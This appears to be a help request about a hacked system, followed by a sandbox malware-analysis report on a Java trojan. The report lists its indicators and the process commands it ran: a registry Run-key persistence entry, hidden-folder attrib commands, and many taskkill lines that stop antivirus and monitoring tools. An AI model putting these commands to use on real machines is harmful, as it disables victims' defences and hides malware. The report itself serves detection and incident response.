My entire system has been hacked. Can you help?
Verdict: malicious
Threat Score: 100/100
AV Multiscan: 45%
Labeled as: Java.Trojan.GenericGB
Tagged as: #trojan
Sample: 9879438b7ff8f9f03ac525addc4d5d18.bz2
Analyzed on November 20th 2017 00:37:46 (CEST) running the Kernelmode monitor
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
VxStream Sandbox v7.10 © Hybrid Analysis
Incident Response Risk Assessment
Persistence
    Modifies auto-execute functionality by setting/creating a value in the registry
    Modifies auto-execute functionality to enable the debugger hack
    Spawns a lot of processes
    Writes data to a remote process
Fingerprint
    Reads the active computer name
    Reads the cryptographic machine GUID
Evasive
    Possibly checks for the presence of a forensics/monitoring tool
Adware
    Possibly checks for the presence of an adware detecting tool
Platform Intelligence Artifact Context
Associated SHA256s
    9e89ea0a97123e1522a04feb49496ee58ae9fb09e6219de9f4e3fd780a9b529d
    c151cf3050ccf82e92465fd24ae3ba77a43c08f7cbdab1abe2ff2697bc981183
Indicators
Malicious Indicators (10)
Anti-Detection/Stealthiness
    Modifies auto-execute functionality to enable the debugger hack
    Terminates other processes using taskkill
External Systems
    Sample was identified as malicious by a large number of Antivirus engines
    Sample was identified as malicious by at least one Antivirus engine
General
    The analysis extracted a file that was identified as malicious
Installation/Persistence
    Writes data to a remote process
System Security
    Terminates system processes
    Uses taskkill excessively (often used to disable security tools)
Unusual Characteristics
    Spawns a lot of processes
1 further malicious indicator is hidden (available only in the private webservice or standalone version)
Suspicious Indicators (15)
Anti-Detection/Stealthiness
    Runs the registry editor in a silent manner
Anti-Reverse Engineering
    Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
    Possibly checks for the presence of a forensics/monitoring tool
Cryptographic Related
    References key cryptographic functions
Environment Awareness
    Reads the active computer name
    Reads the cryptographic machine GUID
Installation/Persistence
    Copies data to/from the Java Runtime folder
    Creates new processes
    Executes a visual basic script
    Modifies auto-execute functionality by setting/creating a value in the registry
Remote Access Related
    Contains references to WMI/WMIC
System Destruction
    Possibly checks for the presence of an adware detecting tool
Unusual Characteristics
    Installs hooks/patches the running process
    Reads information about supported languages
1 further suspicious indicator is hidden (available only in the private webservice or standalone version)
Informative (7)
General
    Creates a writable file in a temporary directory
    Launches a VBS file
    Reads Windows Trust Settings
    Runs shell commands
    Spawns new processes
Installation/Persistence
    Dropped files
    Touches files in the Windows directory
File Details: phpworBHo_.jar
Filename: phpworBHo_.jar
Size: 513KiB (525607 bytes)
Type: java
Description: Java archive data (JAR)
Architecture: WINDOWS
SHA256: 7b965b8a19a7b2ccfb2034b81a8b020247a284638fb3032d1b38337e6dc8943a
Resources: sample icon and PortEx input-file visualization (images not reproduced here)
Classification (TrID): 100.0% (.ZIP) ZIP compressed archive
Analysed 222 processes in total (System Resource Monitor).
javaw.exe -jar "C:\phpworBHo_.jar" (PID: 3068)
java.exe -jar %TEMP%\_0.4121897489030028643705085698298392.class (PID: 3728)
cmd.exe /C cscript.exe %TEMP%\Retrive3005839175773921224.vbs (PID: 4044)
cscript.exe %TEMP%\Retrive3005839175773921224.vbs (PID: 308)
cmd.exe /C cscript.exe %TEMP%\Retrive8519028878817837879.vbs (PID: 3940)
cscript.exe %TEMP%\Retrive8519028878817837879.vbs (PID: 4036)
cmd.exe (PID: 1036)
cmd.exe /C cscript.exe %TEMP%\Retrive3791202351905831748.vbs (PID: 3836)
cscript.exe %TEMP%\Retrive3791202351905831748.vbs (PID: 3756)
cmd.exe /C cscript.exe %TEMP%\Retrive6761054475108374641.vbs (PID: 3844)
cscript.exe %TEMP%\Retrive6761054475108374641.vbs (PID: 1764)
xcopy.exe "xcopy "%PROGRAMFILES%\Java\jre1.8.0_25" "%APPDATA%\Oracle" /e (PID: 1300)
cmd.exe (PID: 3960)
reg.exe "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v wHiDpcbHAYm /t REG_EXPAND_SZ /d ""%APPDATA%\Oracle\bin\javaw.exe" -jar "%USERPROFILE%\ICHxjJDnrDt\SxDRkMDReHZ.DrcPWt"" /f (PID: 1024)
attrib.exe "attrib +h "%USERPROFILE%\ICHxjJDnrDt\*.*" (PID: 2304)
attrib.exe "attrib +h "%USERPROFILE%\ICHxjJDnrDt" (PID: 1804)
javaw.exe -jar %USERPROFILE%\ICHxjJDnrDt\SxDRkMDReHZ.DrcPWt (PID: 2352)
java.exe -jar %TEMP%\_0.467237802677680345016958333484578610.class (PID: 2392)
cmd.exe /C cscript.exe %TEMP%\Retrive3731418051498572090.vbs (PID: 2684)
cscript.exe %TEMP%\Retrive3731418051498572090.vbs (PID: 2832)
cmd.exe /C cscript.exe %TEMP%\Retrive7044146437686179666.vbs (PID: 2812)
cscript.exe %TEMP%\Retrive7044146437686179666.vbs (PID: 2732)
cmd.exe (PID: 2872)
cmd.exe /C cscript.exe %TEMP%\Retrive7628837890759371353.vbs (PID: 1228)
cscript.exe %TEMP%\Retrive7628837890759371353.vbs (PID: 2212)
cmd.exe /C cscript.exe %TEMP%\Retrive3530126421885876512.vbs (PID: 2624)
cscript.exe %TEMP%\Retrive3530126421885876512.vbs (PID: 2696)
cmd.exe (PID: 2736)
taskkill.exe taskkill /IM ProcessHacker.exe /T /F (PID: 3048)
cmd.exe /c regedit.exe /s %TEMP%\YSqRLNkmok2423403084465319161.reg (PID: 3044)
regedit.exe /s %TEMP%\YSqRLNkmok2423403084465319161.reg (PID: 3064)
taskkill.exe taskkill /IM procexp.exe /T /F (PID: 3224)
taskkill.exe taskkill /IM MSASCui.exe /T /F (PID: 1808)
taskkill.exe taskkill /IM MsMpEng.exe /T /F (PID: 3024)
taskkill.exe taskkill /IM MpUXSrv.exe /T /F (PID: 3928)
taskkill.exe taskkill /IM MpCmdRun.exe /T /F (PID: 3948)
taskkill.exe taskkill /IM NisSrv.exe /T /F (PID: 3972)
taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F (PID: 320)
taskkill.exe taskkill /IM procexp.exe /T /F (PID: 1616)
taskkill.exe taskkill /IM wireshark.exe /T /F (PID: 2200)
taskkill.exe taskkill /IM tshark.exe /T /F (PID: 3636)
taskkill.exe taskkill /IM text2pcap.exe /T /F (PID: 2232)
taskkill.exe taskkill /IM rawshark.exe /T /F (PID: 2708)
taskkill.exe taskkill /IM mergecap.exe /T /F (PID: 2640)
taskkill.exe taskkill /IM editcap.exe /T /F (PID: 2784)
taskkill.exe taskkill /IM dumpcap.exe /T /F (PID: 820)
taskkill.exe taskkill /IM capinfos.exe /T /F (PID: 2120)
taskkill.exe taskkill /IM mbam.exe /T /F (PID: 3060)
taskkill.exe taskkill /IM mbamscheduler.exe /T /F (PID: 3072)
taskkill.exe taskkill /IM mbamservice.exe /T /F (PID: 3288)
taskkill.exe taskkill /IM AdAwareService.exe /T /F (PID: 2952)
taskkill.exe taskkill /IM AdAwareTray.exe /T /F (PID: 3292)
taskkill.exe taskkill /IM WebCompanion.exe /T /F (PID: 3388)
taskkill.exe taskkill /IM AdAwareDesktop.exe /T /F (PID: 3452)
taskkill.exe taskkill /IM V3Main.exe /T /F (PID: 3484)
taskkill.exe taskkill /IM V3Svc.exe /T /F (PID: 3576)
taskkill.exe taskkill /IM V3Up.exe /T /F (PID: 3580)
taskkill.exe taskkill /IM V3SP.exe /T /F (PID: 584)
taskkill.exe taskkill /IM V3Proxy.exe /T /F (PID: 976)
taskkill.exe taskkill /IM V3Medic.exe /T /F (PID: 3664)
taskkill.exe taskkill /IM BgScan.exe /T /F (PID: 512)
taskkill.exe taskkill /IM BullGuard.exe /T /F (PID: 1536)
taskkill.exe taskkill /IM BullGuardBhvScanner.exe /T /F (PID: 312)
taskkill.exe taskkill /IM BullGuarScanner.exe /T /F (PID: 324)
taskkill.exe taskkill /IM LittleHook.exe /T /F (PID: 3976)
taskkill.exe taskkill /IM BullGuardUpdate.exe /T /F (PID: 3984)
taskkill.exe taskkill /IM clamscan.exe /T /F (PID: 3712)
taskkill.exe taskkill /IM ClamTray.exe /T /F (PID: 4076)
taskkill.exe taskkill /IM ClamWin.exe /T /F (PID: 4064)
taskkill.exe taskkill /IM cis.exe /T /F (PID: 3740)
taskkill.exe taskkill /IM CisTray.exe /T /F (PID: 1928)
taskkill.exe taskkill /IM cmdagent.exe /T /F (PID: 1424)
taskkill.exe taskkill /IM cavwp.exe /T /F (PID: 2632)
taskkill.exe taskkill /IM dragon_updater.exe /T /F (PID: 2772)
taskkill.exe taskkill /IM MWAGENT.EXE /T /F (PID: 2948)
taskkill.exe taskkill /IM MWASER.EXE /T /F (PID: 2992)
taskkill.exe taskkill /IM CONSCTLX.EXE /T /F (PID: 280)